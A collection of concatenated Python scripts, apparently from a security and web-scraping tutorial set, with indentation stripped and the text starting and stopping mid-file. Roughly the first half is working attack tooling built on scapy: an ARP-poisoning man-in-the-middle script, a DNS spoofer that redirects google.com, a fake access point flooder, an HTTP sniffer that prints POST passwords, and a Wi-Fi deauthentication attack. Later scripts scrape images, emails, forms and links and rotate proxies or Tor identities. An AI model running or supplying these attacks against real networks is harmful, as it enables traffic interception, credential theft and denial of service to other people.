sniff(store=False, prn=process, iface=iface)
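# note: get_mac() sends a fresh ARP request for every sniffed ARP reply, which is slow
# and itself generates traffic. A minimal sketch (hypothetical helper, assuming the
# first answer seen per IP can be trusted) caches lookups in a dict:
#     mac_cache = {}
#     def cached_get_mac(ip):
#         if ip not in mac_cache:
#             mac_cache[ip] = get_mac(ip)
#         return mac_cache[ip]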
from scapy.all import Ether, ARP, srp, send
import argparse
import time
import os
import sys
def _enable_linux_iproute():
"""
Enables IP route ( IP Forward ) in linux-based distro
"""
file_path = "/proc/sys/net/ipv4/ip_forward"
with open(file_path) as f:
if f.read().strip() == "1":
# already enabled
return
with open(file_path, "w") as f:
print(1, file=f)
def _enable_windows_iproute():
"""
Enables IP route (IP Forwarding) in Windows
"""
from services import WService
# enable Remote Access service
service = WService("RemoteAccess")
service.start()
def enable_ip_route(verbose=True):
"""
Enables IP forwarding
"""
if verbose:
print("[!] Enabling IP Routing...")
_enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute()
if verbose:
print("[!] IP Routing enabled.")
def get_mac(ip):
"""
Returns the MAC address of any device connected to the network.
If ip is down, returns None instead
"""
ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs target_ip, saying that we are host_ip.
This is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words an ARP response
# we don't specify 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing any thing
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def restore(target_ip, host_ip, verbose=True):
"""
Restores the normal process of a regular network
This is done by sending the original information
(the real IP and MAC of host_ip) to target_ip
"""
# get the real MAC address of target
target_mac = get_mac(target_ip)
# get the real MAC address of spoofed (gateway, i.e router)
host_mac = get_mac(host_ip)
# crafting the restoring packet
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
# sending the restoring packet
# to restore the network to its normal process
# we send each reply seven times for good measure (count=7)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP spoof script")
parser.add_argument("target", help="Victim IP Address to ARP poison")
parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)")
parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
args = parser.parse_args()
target, host, verbose = args.target, args.host, args.verbose
enable_ip_route()
try:
while True:
# telling the target that we are the host
spoof(target, host, verbose)
# telling the host that we are the target
spoof(host, target, verbose)
# sleep for one second
time.sleep(1)
except KeyboardInterrupt:
print("[!] Detected CTRL+C ! restoring the network, please wait...")
restore(target, host)
restore(host, target)
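# example usage (hypothetical addresses; must be run with root privileges because scapy
# sends raw packets): python arp_spoof.py 192.168.1.100 192.168.1.1 --verbose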
import win32serviceutil
import time
class WService:
def __init__(self, service, machine=None, verbose=False):
self.service = service
self.machine = machine
self.verbose = verbose
@property
def running(self):
return win32serviceutil.QueryServiceStatus(self.service)[1] == 4
def start(self):
if not self.running:
win32serviceutil.StartService(self.service)
time.sleep(1)
if self.running:
if self.verbose:
print(f"[+] {self.service} started successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is already running.")
def stop(self):
if self.running:
win32serviceutil.StopService(self.service)
time.sleep(0.5)
if not self.running:
if self.verbose:
print(f"[+] {self.service} stopped successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot stop {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def restart(self):
if self.running:
win32serviceutil.RestartService(self.service)
time.sleep(2)
if self.running:
if self.verbose:
print(f"[+] {self.service} restarted successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def main(action, service):
service = WService(service, verbose=True)
if action == "start":
service.start()
elif action == "stop":
service.stop()
elif action == "restart":
service.restart()
# getattr(remoteAccessService, action, "start")()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Windows Service Handler")
parser.add_argument("service")
parser.add_argument("-a", "--action", help="action to do, 'start', 'stop' or 'restart'",
action="store", required=True, dest="action")
given_args = parser.parse_args()
service, action = given_args.service, given_args.action
main(action, service)
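# example usage (run from an elevated prompt on Windows; requires the pywin32 package
# for win32serviceutil): python services.py RemoteAccess --action start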
from scapy.all import *
import time
hosts = []
def listen_dhcp():
# Make sure it is DHCP with the filter options
k = sniff(prn=print_packet, filter='udp and (port 67 or port 68)')
def print_packet(packet):
target_mac, requested_ip, hostname, vendor_id = [None] * 4
if packet.haslayer(Ether):
target_mac = packet.getlayer(Ether).src
# get the DHCP options
dhcp_options = packet[DHCP].options
for item in dhcp_options:
try:
label, value = item
except ValueError:
continue
if label == 'requested_addr':
requested_ip = value
elif label == 'hostname':
hostname = value.decode()
elif label == 'vendor_class_id':
vendor_id = value.decode()
if target_mac and vendor_id and hostname and requested_ip and target_mac not in hosts:
hosts.append(target_mac)
time_now = time.strftime("[%Y-%m-%d - %H:%M:%S] ")
print("{}: {} - {} / {} requested {}".format(time_now, target_mac, hostname, vendor_id, requested_ip))
if __name__ == "__main__":
listen_dhcp()
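# note: sniffing requires root/administrator privileges; the BPF filter
# 'udp and (port 67 or port 68)' matches both the DHCP server port (67) and the
# DHCP client port (68), so requests and replies are both captured.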
from scapy.all import *
from netfilterqueue import NetfilterQueue
import os
# DNS mapping records, feel free to add/modify this dictionary
# for example, google.com will be redirected to 192.168.1.100
dns_hosts = {
b"www.google.com.": "192.168.1.100",
b"google.com.": "192.168.1.100",
b"facebook.com.": "172.217.19.142"
}
def process_packet(packet):
"""
Whenever a new packet is redirected to the netfilter queue,
this callback is called.
"""
# convert netfilter queue packet to scapy packet
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(DNSRR):
# if the packet is a DNS Resource Record (DNS reply)
# modify the packet
print("[Before]:", scapy_packet.summary())
try:
scapy_packet = modify_packet(scapy_packet)
except IndexError:
# not UDP packet, this can be IPerror/UDPerror packets
pass
print("[After ]:", scapy_packet.summary())
# set back as netfilter queue packet
packet.set_payload(bytes(scapy_packet))
# accept the packet
packet.accept()
def modify_packet(packet):
"""
Modifies the DNS Resource Record packet (the answer part)
to map our globally defined dns_hosts dictionary.
For instance, whenever we see a google.com answer, this function replaces
the real IP address (172.217.19.142) with the fake IP address (192.168.1.100)
"""
# get the DNS question name, the domain name
qname = packet[DNSQR].qname
if qname not in dns_hosts:
# if the website isn't in our record
# we don't wanna modify that
print("no modification:", qname)
return packet
# craft new answer, overriding the original
# setting the rdata for the IP we want to redirect (spoofed)
# for instance, google.com will be mapped to "192.168.1.100"
packet[DNS].an = DNSRR(rrname=qname, rdata=dns_hosts[qname])
# set the answer count to 1
packet[DNS].ancount = 1
# delete checksums and length of packet, because we have modified the packet
# new calculations are required ( scapy will do automatically )
del packet[IP].len
del packet[IP].chksum
del packet[UDP].len
del packet[UDP].chksum
# return the modified packet
return packet
if __name__ == "__main__":
QUEUE_NUM = 0
# insert the iptables FORWARD rule
os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
# instantiate the netfilter queue
queue = NetfilterQueue()
try:
# bind the queue number to our callback process_packet
# and start it
queue.bind(QUEUE_NUM, process_packet)
queue.run()
except KeyboardInterrupt:
# if want to exit, make sure we
# remove that rule we just inserted, going back to normal.
os.system("iptables --flush")
from scapy.all import *
from threading import Thread
from faker import Faker
def send_beacon(ssid, mac, infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
# type=0: management frame
# subtype=8: beacon frame
# addr1: MAC address of the receiver
# addr2: MAC address of the sender
# addr3: MAC address of the Access Point (AP)
# beacon frame
beacon = Dot11Beacon()
# we inject the ssid name
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
# stack all the layers and add a RadioTap
frame = RadioTap()/dot11/beacon/essid
# send the frame
if infinite:
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
else:
sendp(frame, iface=iface, verbose=0)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Fake Access Point Generator")
parser.add_argument("interface", default="wlan0mon", help="The interface to send beacon frames with, must be in monitor mode")
parser.add_argument("-n", "--access-points", dest="n_ap", help="Number of access points to be generated")
args = parser.parse_args()
n_ap = args.n_ap
iface = args.interface
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(n_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
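# example usage (hypothetical script name and interface, which must already be in
# monitor mode): python fake_access_points.py wlan0mon -n 5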
from scapy.all import *
from scapy.layers.http import HTTPRequest # import HTTP packet
from colorama import init, Fore
# initialize colorama
init()
# define colors
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
def sniff_packets(iface=None):
"""
Sniff port 80 packets on iface; if None (default), then
scapy's default interface is used
"""
if iface:
# port 80 for http (generally)
# process_packet is the callback
sniff(filter="port 80", prn=process_packet, iface=iface, store=False)
else:
# sniff with default interface
sniff(filter="port 80", prn=process_packet, store=False)
def process_packet(packet):
"""
This function is executed whenever a packet is sniffed
"""
if packet.haslayer(HTTPRequest):
# if this packet is an HTTP Request
# get the requested URL
url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
# get the requester's IP Address
ip = packet[IP].src
# get the request method
method = packet[HTTPRequest].Method.decode()
print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}")
if show_raw and packet.haslayer(Raw) and method == "POST":
# if show_raw flag is enabled, has raw data, and the requested method is "POST"
# then show raw
print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="HTTP Packet Sniffer, this is useful when you're a man in the middle." \
+ "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your personal packets")
parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface")
parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.")
# parse arguments
args = parser.parse_args()
iface = args.iface
show_raw = args.show_raw
sniff_packets(iface)
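# example usage (hypothetical interface name; run as root, ideally after ARP spoofing
# the target so its traffic flows through this machine):
#     python http_sniffer.py -i wlan0 --show-raw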
from scapy.all import *
def deauth(target_mac, gateway_mac, inter=0.1, count=None, loop=1, iface="wlan0mon", verbose=1):
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = RadioTap()/dot11/Dot11Deauth(reason=7)
# send the packet
sendp(packet, inter=inter, count=count, loop=loop, iface=iface, verbose=verbose)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="A python script for sending deauthentication frames")
parser.add_argument("target", help="Target MAC address to deauthenticate.")
parser.add_argument("gateway", help="Gateway MAC address that target is authenticated with")
parser.add_argument("-c" , "--count", help="number of deauthentication frames to send, specify 0 to keep sending infinitely, default is 0", default=0)
parser.add_argument("--interval", help="The sending frequency between two frames sent, default is 100ms", default=0.1)
parser.add_argument("-i", dest="iface", help="Interface to use, must be in monitor mode, default is 'wlan0mon'", default="wlan0mon")
parser.add_argument("-v", "--verbose", help="wether to print messages", action="store_true")
args = parser.parse_args()
target = args.target
gateway = args.gateway
count = int(args.count)
interval = float(args.interval)
iface = args.iface
verbose = args.verbose
if count == 0:
# if count is 0, it means we loop forever (until interrupt)
loop = 1
count = None
else:
loop = 0
# printing some info messages
if verbose:
if count:
print(f"[+] Sending {count} frames every {interval}s...")
else:
print(f"[+] Sending frames every {interval}s for ever...")
deauth(target, gateway, interval, count, loop, iface, verbose)
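# example usage (placeholder MAC addresses; the interface must be in monitor mode):
#     python deauth.py xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy -i wlan0mon -v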
from scapy.all import ARP, Ether, srp
target_ip = "192.168.1.1/24"
# IP Address for the destination
# create ARP packet
arp = ARP(pdst=target_ip)
# create the Ether broadcast packet
# ff:ff:ff:ff:ff:ff MAC address indicates broadcasting
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
# stack them
packet = ether/arp
result = srp(packet, timeout=3, verbose=0)[0]
# a list of clients, we will fill this in the upcoming loop
clients = []
for sent, received in result:
# for each response, append ip and mac address to clients list
clients.append({'ip': received.psrc, 'mac': received.hwsrc})
# print clients
print("Available devices in the network:")
print("IP" + " "*18+"MAC")
for client in clients:
print("{:16} {}".format(client['ip'], client['mac']))
from scapy.all import *
from threading import Thread
import pandas
import time
import os
import sys
# initialize the networks dataframe that will contain all access points nearby
networks = pandas.DataFrame(columns=["BSSID", "SSID", "dBm_Signal", "Channel", "Crypto"])
# set the index BSSID (MAC address of the AP)
networks.set_index("BSSID", inplace=True)
def callback(packet):
if packet.haslayer(Dot11Beacon):
# extract the MAC address of the network
bssid = packet[Dot11].addr2
# get the name of it
ssid = packet[Dot11Elt].info.decode()
try:
dbm_signal = packet.dBm_AntSignal
except:
dbm_signal = "N/A"
# extract network stats
stats = packet[Dot11Beacon].network_stats()
# get the channel of the AP
channel = stats.get("channel")
# get the crypto
crypto = stats.get("crypto")
networks.loc[bssid] = (ssid, dbm_signal, channel, crypto)
def print_all():
while True:
os.system("clear")
print(networks)
time.sleep(0.5)
def change_channel():
ch = 1
while True:
os.system(f"iwconfig {interface} channel {ch}")
# switch channel from 1 to 14 each 0.5s
ch = ch % 14 + 1
time.sleep(0.5)
if __name__ == "__main__":
# interface name, check using iwconfig
interface = sys.argv[1]
# start the thread that prints all the networks
printer = Thread(target=print_all)
printer.daemon = True
printer.start()
# start the channel changer
channel_changer = Thread(target=change_channel)
channel_changer.daemon = True
channel_changer.start()
# start sniffing
sniff(prn=callback, iface=interface)
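# example usage (hypothetical interface name; requires root and a wireless card in
# monitor mode, and the 'clear'/'iwconfig' calls above assume a Linux system):
#     sudo python wifi_scanner.py wlan0mon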
import requests
import os
from tqdm import tqdm
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin, urlparse
def is_valid(url):
"""
Checks whether url is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_images(url):
"""
Returns all image URLs on a single url
"""
soup = bs(requests.get(url).content, "html.parser")
urls = []
for img in tqdm(soup.find_all("img"), "Extracting images"):
img_url = img.attrs.get("src")
if not img_url:
# if img does not contain src attribute, just skip
continue
# make the URL absolute by joining domain with the URL that is just extracted
img_url = urljoin(url, img_url)
# remove URLs like '/hsts-pixel.gif?c=3.2.5'
try:
pos = img_url.index("?")
img_url = img_url[:pos]
except ValueError:
pass
# finally, if the url is valid
if is_valid(img_url):
urls.append(img_url)
return urls
def download(url, pathname):
"""
Downloads a file given a URL and puts it in the folder pathname
"""
# if path doesn't exist, make that path dir
if not os.path.isdir(pathname):
os.makedirs(pathname)
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the file name
filename = os.path.join(pathname, url.split("/")[-1])
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(1024), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data))
def main(url, path):
# get all images
imgs = get_all_images(url)
for img in imgs:
# for each img, download it
download(img, path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="This script downloads all images from a web page")
parser.add_argument("url", help="The URL of the web page you want to download images")
parser.add_argument("-p", "--path", help="The Directory you want to store your images, default is the domain of URL passed")
args = parser.parse_args()
url = args.url
path = args.path
if not path:
# if path isn't specified, use the domain name of that url as the folder name
path = urlparse(url).netloc
main(url, path)
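# example usage (hypothetical URL; images land in a folder named after the domain
# unless -p is given): python download_images.py https://example.com/gallery -p images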
from requests_html import HTMLSession
import requests
from tqdm import tqdm
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin, urlparse
import os
def is_valid(url):
"""
Checks whether url is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_images(url):
"""
Returns all image URLs on a single url
"""
# initialize the session
session = HTMLSession()
# make the HTTP request and retrieve response
response = session.get(url)
# execute Javascript
response.html.render()
# construct the soup parser
soup = bs(response.html.html, "html.parser")
urls = []
for img in tqdm(soup.find_all("img"), "Extracting images"):
img_url = img.attrs.get("src") or img.attrs.get("data-src")
if not img_url:
# if img does not contain src attribute, just skip
continue
# make the URL absolute by joining domain with the URL that is just extracted
img_url = urljoin(url, img_url)
# remove URLs like '/hsts-pixel.gif?c=3.2.5'
try:
pos = img_url.index("?")
img_url = img_url[:pos]
except ValueError:
pass
# finally, if the url is valid
if is_valid(img_url):
urls.append(img_url)
return urls
def download(url, pathname):
"""
Downloads a file given a URL and puts it in the folder pathname
"""
# if path doesn't exist, make that path dir
if not os.path.isdir(pathname):
os.makedirs(pathname)
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the file name
filename = os.path.join(pathname, url.split("/")[-1])
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(1024), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data))
def main(url, path):
# get all images
imgs = get_all_images(url)
for img in imgs:
# for each img, download it
download(img, path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="This script downloads all images from a web page")
parser.add_argument("url", help="The URL of the web page you want to download images")
parser.add_argument("-p", "--path", help="The Directory you want to store your images, default is the domain of URL passed")
args = parser.parse_args()
url = args.url
path = args.path
if not path:
# if path isn't specified, use the domain name of that url as the folder name
path = urlparse(url).netloc
main(url, path)
import re
from requests_html import HTMLSession
import sys
url = sys.argv[1]
EMAIL_REGEX = r"""(?:[a-z0-9!#%&'*+/=?^_{|}-]+(?:\.[a-z0-9!#%&'*+/=?^_{|}-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])"""
# initiate an HTTP session
session = HTMLSession()
# get the HTTP Response
r = session.get(url)
# for JavaScript-driven websites
r.html.render()
with open(sys.argv[2], "a") as f:
for re_match in re.finditer(EMAIL_REGEX, r.html.raw_html.decode()):
print(re_match.group().strip(), file=f)
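# example usage (hypothetical URL; the second argument is the output file the matches
# are appended to): python email_extractor.py https://example.com emails.txt
# note: r.html.render() drives a headless Chromium that requests_html downloads on first use.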
from bs4 import BeautifulSoup
from requests_html import HTMLSession
from pprint import pprint
# initialize an HTTP session
session = HTMLSession()
def get_all_forms(url):
"""Returns all form tags found on a web page's url """
# GET request
res = session.get(url)
# for javascript driven website
# res.html.render()
soup = BeautifulSoup(res.html.html, "html.parser")
return soup.find_all("form")
def get_form_details(form):
"""Returns the HTML details of a form,
including action, method and list of form controls (inputs, etc)"""
details = {}
# get the form action (requested URL)
action = form.attrs.get("action").lower()
# get the form method (POST, GET, DELETE, etc)
# if not specified, GET is the default in HTML
method = form.attrs.get("method", "get").lower()
# get all form inputs
inputs = []
for input_tag in form.find_all("input"):
# get type of input form control
input_type = input_tag.attrs.get("type", "text")
# get name attribute
input_name = input_tag.attrs.get("name")
# get the default value of that input tag
input_value = input_tag.attrs.get("value", "")
# add everything to that list
inputs.append({"type": input_type, "name": input_name, "value": input_value})
# put everything to the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
if __name__ == "__main__":
import sys
# get URL from the command line
url = sys.argv[1]
# get all form tags
forms = get_all_forms(url)
# iterate over forms
for i, form in enumerate(forms, start=1):
form_details = get_form_details(form)
print("="*50, f"form #{i}", "="*50)
pprint(form_details)
from bs4 import BeautifulSoup
from requests_html import HTMLSession
from pprint import pprint
from urllib.parse import urljoin
import webbrowser
import sys
from form_extractor import get_all_forms, get_form_details, session
# get the URL from the command line
url = sys.argv[1]
# get the first form (edit this as you wish)
first_form = get_all_forms(url)[0]
# extract all form details
form_details = get_form_details(first_form)
pprint(form_details)
# the data body we want to submit
data = {}
for input_tag in form_details["inputs"]:
if input_tag["type"] == "hidden":
# if it's hidden, use the default value
data[input_tag["name"]] = input_tag["value"]
elif input_tag["type"] != "submit":
# all others except submit, prompt the user to set it
value = input(f"Enter the value of the field '{input_tag['name']}' (type: {input_tag['type']}): ")
data[input_tag["name"]] = value
# join the url with the action (form request URL)
url = urljoin(url, form_details["action"])
if form_details["method"] == "post":
res = session.post(url, data=data)
elif form_details["method"] == "get":
res = session.get(url, params=data)
# the below code is only for replacing relative URLs to absolute ones
soup = BeautifulSoup(res.content, "html.parser")
for link in soup.find_all("link"):
try:
link.attrs["href"] = urljoin(url, link.attrs["href"])
except:
pass
for script in soup.find_all("script"):
try:
script.attrs["src"] = urljoin(url, script.attrs["src"])
except:
pass
for img in soup.find_all("img"):
try:
img.attrs["src"] = urljoin(url, img.attrs["src"])
except:
pass
for a in soup.find_all("a"):
try:
a.attrs["href"] = urljoin(url, a.attrs["href"])
except:
pass
# write the page content to a file
open("page.html", "w").write(str(soup))
# open the page on the default browser
webbrowser.open("page.html")
import requests
import pandas as pd
from bs4 import BeautifulSoup as bs
USER_AGENT = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# US english
LANGUAGE = "en-US,enq=0.5"
def get_soup(url):
"""Constructs and returns a soup using the HTML content of url passed"""
# initialize a session
session = requests.Session()
# set the User-Agent as a regular browser
session.headers['User-Agent'] = USER_AGENT
# request for english content (optional)
session.headers['Accept-Language'] = LANGUAGE
session.headers['Content-Language'] = LANGUAGE
# make the request
html = session.get(url)
# return the soup
return bs(html.content, "html.parser")
def get_all_tables(soup):
"""Extracts and returns all tables in a soup object"""
return soup.find_all("table")
def get_table_headers(table):
"""Given a table soup, returns all the headers"""
headers = []
for th in table.find("tr").find_all("th"):
headers.append(th.text.strip())
return headers
def get_table_rows(table):
"""Given a table, returns all its rows"""
rows = []
for tr in table.find_all("tr")[1:]:
cells = []
# grab all td tags in this table row
tds = tr.find_all("td")
if len(tds) == 0:
# if no td tags, search for th tags
# (header cells can appear in body rows, especially in Wikipedia tables)
ths = tr.find_all("th")
for th in ths:
cells.append(th.text.strip())
else:
# use regular td tags
for td in tds:
cells.append(td.text.strip())
rows.append(cells)
return rows
def save_as_csv(table_name, headers, rows):
pd.DataFrame(rows, columns=headers).to_csv(f"{table_name}.csv")
def main(url):
# get the soup
soup = get_soup(url)
# extract all the tables from the web page
tables = get_all_tables(soup)
print(f"[+] Found a total of {len(tables)} tables.")
# iterate over all tables
for i, table in enumerate(tables, start=1):
# get the table headers
headers = get_table_headers(table)
# get all the rows of the table
rows = get_table_rows(table)
# save table as csv file
table_name = f"table-{i}"
print(f"[+] Saving {table_name}")
save_as_csv(table_name, headers, rows)
if __name__ == "__main__":
import sys
try:
url = sys.argv[1]
except IndexError:
print("Please specify a URL.\nUsage: python html_table_extractor.py [URL]")
exit(1)
main(url)
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import colorama
# init the colorama module
colorama.init()
GREEN = colorama.Fore.GREEN
GRAY = colorama.Fore.LIGHTBLACK_EX
RESET = colorama.Fore.RESET
# initialize the set of links (unique links)
internal_urls = set()
external_urls = set()
total_urls_visited = 0
def is_valid(url):
"""
Checks whether url is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_website_links(url):
"""
Returns all URLs found on url that belong to the same website
"""
# all URLs of url
urls = set()
# domain name of the URL without the protocol
domain_name = urlparse(url).netloc
soup = BeautifulSoup(requests.get(url).content, "html.parser")
for a_tag in soup.findAll("a"):
href = a_tag.attrs.get("href")
if href == "" or href is None:
# href empty tag
continue
# join the URL if it's relative (not absolute link)
href = urljoin(url, href)
parsed_href = urlparse(href)
# remove URL GET parameters, URL fragments, etc.
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
if not is_valid(href):
# not a valid URL
continue
if href in internal_urls:
# already in the set
continue
if domain_name not in href:
# external link
if href not in external_urls:
print(f"{GRAY}[!] External link: {href}{RESET}")
external_urls.add(href)
continue
print(f"{GREEN}[*] Internal link: {href}{RESET}")
urls.add(href)
internal_urls.add(href)
return urls
def crawl(url, max_urls=50):
"""
Crawls a web page and extracts all links.
You'll find all links in external_urls and internal_urls global set variables.
params:
max_urls (int): maximum number of URLs to crawl, default is 50.
"""
global total_urls_visited
total_urls_visited += 1
links = get_all_website_links(url)
for link in links:
if total_urls_visited > max_urls:
break
crawl(link, max_urls=max_urls)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Link Extractor Tool with Python")
parser.add_argument("url", help="The URL to extract links from.")
parser.add_argument("-m", "--max-urls", help="Number of max URLs to crawl, default is 30.", default=30, type=int)
args = parser.parse_args()
url = args.url
max_urls = args.max_urls
crawl(url, max_urls=max_urls)
print("[+] Total Internal links:", len(internal_urls))
print("[+] Total External links:", len(external_urls))
print("[+] Total URLs:", len(external_urls) + len(internal_urls))
domain_name = urlparse(url).netloc
# save the internal links to a file
with open(f"{domain_name}_internal_links.txt", "w") as f:
for internal_link in internal_urls:
print(internal_link.strip(), file=f)
# save the external links to a file
with open(f"{domain_name}_external_links.txt", "w") as f:
for external_link in external_urls:
print(external_link.strip(), file=f)
import requests
import random
from bs4 import BeautifulSoup as bs
def get_free_proxies():
url = "https://free-proxy-list.net/"
# get the HTTP response and construct soup object
soup = bs(requests.get(url).content, "html.parser")
proxies = []
for row in soup.find("table", attrs={"id": "proxylisttable"}).find_all("tr")[1:]:
tds = row.find_all("td")
try:
ip = tds[0].text.strip()
port = tds[1].text.strip()
host = f"{ip}:{port}"
proxies.append(host)
except IndexError:
continue
return proxies
def get_session(proxies):
# construct an HTTP session
session = requests.Session()
# choose one random proxy
proxy = random.choice(proxies)
session.proxies = {"http": proxy, "https": proxy}
return session
if __name__ == "__main__":
# proxies = get_free_proxies()
proxies = [
'167.172.248.53:3128',
'194.226.34.132:5555',
'203.202.245.62:80',
'141.0.70.211:8080',
'118.69.50.155:80',
'201.55.164.177:3128',
'51.15.166.107:3128',
'91.205.218.64:80',
'128.199.237.57:8080',
]
for i in range(5):
s = get_session(proxies)
try:
print("Request page with IP:", s.get("http://icanhazip.com", timeout=1.5).text.strip())
except Exception as e:
continue
import requests
from stem.control import Controller
from stem import Signal
def get_tor_session():
# initialize a requests Session
session = requests.Session()
# setting the proxy of both http & https to the localhost:9050
# (Tor service must be installed and started in your machine)
session.proxies = {"http": "socks5://localhost:9050", "https": "socks5://localhost:9050"}
return session
def renew_connection():
with Controller.from_port(port=9051) as c:
c.authenticate()
# send NEWNYM signal to establish a new clean connection through the Tor network
c.signal(Signal.NEWNYM)
if __name__ == "__main__":
s = get_tor_session()
ip = s.get("http://icanhazip.com").text
print("IP:", ip)
renew_connection()
s = get_tor_session()
ip = s.get("http://icanhazip.com").text
print("IP:", ip)
import requests
def get_tor_session():
# initialize a requests Session
session = requests.Session()
# this requires a running Tor service in your machine and listening on port 9050 (by default)
session.proxies = {"http": "socks5://localhost:9050", "https": "socks5://localhost:9050"}
return session
if __name__ == "__main__":
s = get_tor_session()
ip = s.get("http://icanhazip.com").text
print("IP:", ip)
import requests
url = "http://icanhazip.com"
proxy_host = "proxy.crawlera.com"
proxy_port = "8010"
proxy_auth = ":"
proxies = {
"https": f"https://{proxy_auth}{proxy_host}:{proxy_port}/",
"http": f"http://{proxy_auth}{proxy_host}:{proxy_port}/"
}
r = requests.get(url, proxies=proxies, verify=False)
from bs4 import BeautifulSoup as bs
import requests
USER_AGENT = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# US english
LANGUAGE = "en-US,enq=0.5"
def get_weather_data(url):
session = requests.Session()
session.headers['User-Agent'] = USER_AGENT
session.headers['Accept-Language'] = LANGUAGE
session.headers['Content-Language'] = LANGUAGE
html = session.get(url)
# create a new soup
soup = bs(html.text, "html.parser")
# store all results on this dictionary
result = {}
# extract region
result['region'] = soup.find("div", attrs={"id": "wob_loc"}).text
# extract temperature now
result['temp_now'] = soup.find("span", attrs={"id": "wob_tm"}).text
# get the day and hour now
